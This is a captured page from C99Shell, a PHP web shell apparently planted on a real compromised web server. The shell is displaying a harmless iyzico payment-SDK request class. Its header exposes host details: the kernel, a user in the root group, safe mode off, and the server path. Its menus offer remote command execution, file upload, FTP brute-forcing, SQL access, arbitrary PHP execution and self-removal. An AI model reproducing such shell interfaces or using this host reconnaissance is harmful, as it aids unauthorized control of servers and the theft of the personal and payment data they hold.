!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/iyzico/iyzipay-php/src/Iyzipay/Request/   drwxr-xr-x
Free 28.9 GB of 117.98 GB (24.49%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     CreateC2CSubMerchantRequest.php (2.93 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Iyzipay\Request;

use 
Iyzipay\JsonBuilder;
use 
Iyzipay\Request;
use 
Iyzipay\RequestStringBuilder;

class 
CreateC2CSubMerchantRequest extends Request {
    private 
string $name;
    private 
string $surname;
    private 
string $email;
    private 
string $gsmNumber;
    private 
string $tckNo;
    private 
string $birthDate;
    private 
string $address;
    private 
string $externalId;

    public function 
getName(): string {
        return 
$this->name;
    }

    public function 
setName(string $name): void {
        
$this->name $name;
    }

    public function 
getSurname(): string {
        return 
$this->surname;
    }

    public function 
setSurname(string $surname): void {
        
$this->surname $surname;
    }

    public function 
getEmail(): string {
        return 
$this->email;
    }

    public function 
setEmail(string $email): void {
        
$this->email $email;
    }

    public function 
getGsmNumber(): string {
        return 
$this->gsmNumber;
    }

    public function 
setGsmNumber(string $gsmNumber): void {
        
$this->gsmNumber $gsmNumber;
    }

    public function 
getTckNo(): string {
        return 
$this->tckNo;
    }

    public function 
setTckNo(string $tckNo): void {
        
$this->tckNo $tckNo;
    }

    public function 
getBirthDate(): string {
        return 
$this->birthDate;
    }

    public function 
setBirthDate(string $birthDate): void {
        
$this->birthDate $birthDate;
    }

    public function 
getAddress(): string {
        return 
$this->address;
    }

    public function 
setAddress(string $address): void {
        
$this->address $address;
    }

    public function 
getExternalId(): string {
        return 
$this->externalId;
    }

    public function 
setExternalId(string $externalId): void {
        
$this->externalId $externalId;
    }

    public function 
getJsonObject(): array {
        return 
JsonBuilder::fromJsonObject(parent::getJsonObject())
            ->
add('name'$this->getName())
            ->
add('surname'$this->getSurname())
            ->
add('email'$this->getEmail())
            ->
add('gsmNumber'$this->getGsmNumber())
            ->
add('tckNo'$this->getTckNo())
            ->
add('birthDate'$this->getBirthDate())
            ->
add('address'$this->getAddress())
            ->
add('externalId'$this->getExternalId())
            ->
getObject();
    }

    public function 
toPKIRequestString(): string {
        return 
RequestStringBuilder::create()
            ->
appendSuper(parent::toPKIRequestString())
            ->
append('name'$this->getName())
            ->
append('surname'$this->getSurname())
            ->
append('email'$this->getEmail())
            ->
append('gsmNumber'$this->getGsmNumber())
            ->
append('tckNo'$this->getTckNo())
            ->
append('birthDate'$this->getBirthDate())
            ->
append('address'$this->getAddress())
            ->
append('externalId'$this->getExternalId())
            ->
getRequestString();
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0033 ]--